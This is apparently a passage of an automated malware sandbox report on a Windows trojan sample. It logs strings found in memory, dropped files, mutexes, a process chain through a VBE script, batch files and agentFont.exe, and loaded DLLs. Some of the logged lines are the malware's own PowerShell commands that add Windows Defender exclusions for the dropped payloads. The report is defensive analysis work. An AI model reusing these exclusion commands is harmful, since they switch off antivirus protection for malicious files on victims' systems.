                                Source: powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000018.00000002.1887548221.0000026E25409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DCA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDCB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: agentFont.exe, 00000005.00000002.1729799646.0000000003609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1887548221.0000026E251E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 00000018.00000002.1887548221.0000026E25409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DCA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDCB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 0000001F.00000002.2840898058.000001DFD5B90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.t.com/pk
                                Source: agentFont.exe, 00000026.00000002.2305020580.0000000002B1F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.
                                Source: powershell.exe, 00000018.00000002.1887548221.0000026E251E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 00000018.00000002.3033324077.0000026E35256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2251897413.000001E9EC8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3035292117.0000019B3F6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3003208028.000001A2507E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2522595747.000001DFCDB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                                System Summary

                                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe | Code function: 0_2_00007FF7B8EFB8F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | File created: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | File created: C:\Windows\INF\1668b549825c2a
                                Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\AnJfWYZZ.log 1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | Code function: String function: 0073EB78 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | Code function: String function: 0073F5F0 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | Code function: String function: 0073EC50 appears 56 times
                                Source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs QH67JSdZWl.exe
                                Source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs QH67JSdZWl.exe
                                Source: agentFont.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: DONEBnCAFZiOynZWpVVmZLvNQeA.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: RuntimeBroker.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, muXnpA6lFel6HrDvFg0.cs | Cryptographic APIs: 'CreateDecryptor'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, muXnpA6lFel6HrDvFg0.cs | Cryptographic APIs: 'CreateDecryptor'
                                Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@43/52@2/1
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe | Code function: 0_2_00007FF7B8EFAE3C GetLastError,FormatMessageW,LocalFree
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe | Code function: 0_2_00007FF7B8F17EA8 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | File created: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | File created: C:\Users\user\Desktop\HhjUFBqv.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | Mutant created: NULL
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-zJ96YeHxtQ4bDVXj3fVS
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
                                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | Command line argument: sfxname (1_2_0073DF1E)
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | Command line argument: sfxstime (1_2_0073DF1E)
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | Command line argument: STARTDLG (1_2_0073DF1E)
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | Command line argument: xzw (1_2_0073DF1E)
                                Source: QH67JSdZWl.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe | File read: C:\Windows\win.ini
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: QH67JSdZWl.exe | Virustotal: Detection: 44%
                                Source: QH67JSdZWl.exe | ReversingLabs: Detection: 60%
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe | File read: C:\Users\user\Desktop\QH67JSdZWl.exe
                                Source: unknown | Process created: C:\Users\user\Desktop\QH67JSdZWl.exe "C:\Users\user\Desktop\QH67JSdZWl.exe"
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe"
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe"
                                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll/agentFont.exe"
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\mshypercomponentSavesdll\agentFont.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\mshypercomponentSavesdll\agentFont.exe C:\mshypercomponentSavesdll\agentFont.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: unknownProcess created: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll\agentFont.exe"
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: mscoree.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: kernel.appcore.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: version.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: uxtheme.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: windows.storage.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wldp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: profapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptsp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rsaenh.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptbase.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: sspicli.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: mscoree.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: kernel.appcore.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: version.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: uxtheme.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: windows.storage.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wldp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: profapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptsp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rsaenh.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptbase.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: mscoree.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: apphelp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: version.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: wldp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: profapi.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: rsaenh.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: cryptbase.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: sspicli.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: mscoree.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: version.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: wldp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: profapi.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: rsaenh.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: cryptbase.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Section loaded: sspicli.dll
                                Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                                Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
                                Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                                Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                                Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: mscoree.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: kernel.appcore.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: version.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: vcruntime140_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: uxtheme.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: windows.storage.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: wldp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: profapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: cryptsp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: rsaenh.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: cryptbase.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: sspicli.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: ktmw32.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: rasapi32.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: rasman.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: rtutils.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: mswsock.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: winhttp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: ondemandconnroutehelper.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: iphlpapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: dhcpcsvc6.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: dhcpcsvc.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: dnsapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: winnsi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: rasadhlp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: fwpuclnt.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: wbemcomn.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: amsi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: userenv.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: winmm.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: winmmbase.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Section loaded: mmdevapi.dll
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                Source: Window Recorder Window detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Directory created: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Directory created: C:\Program Files\Adobe\Acrobat DC\Resource\9e8d7a4ca61bd9
                                Source: QH67JSdZWl.exe Static PE information: Image base 0x140000000 > 0x60000000
                                Source: QH67JSdZWl.exe Static file information: File size 1898695 > 1048576
                                Source: QH67JSdZWl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: QH67JSdZWl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: QH67JSdZWl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: QH67JSdZWl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: QH67JSdZWl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: QH67JSdZWl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
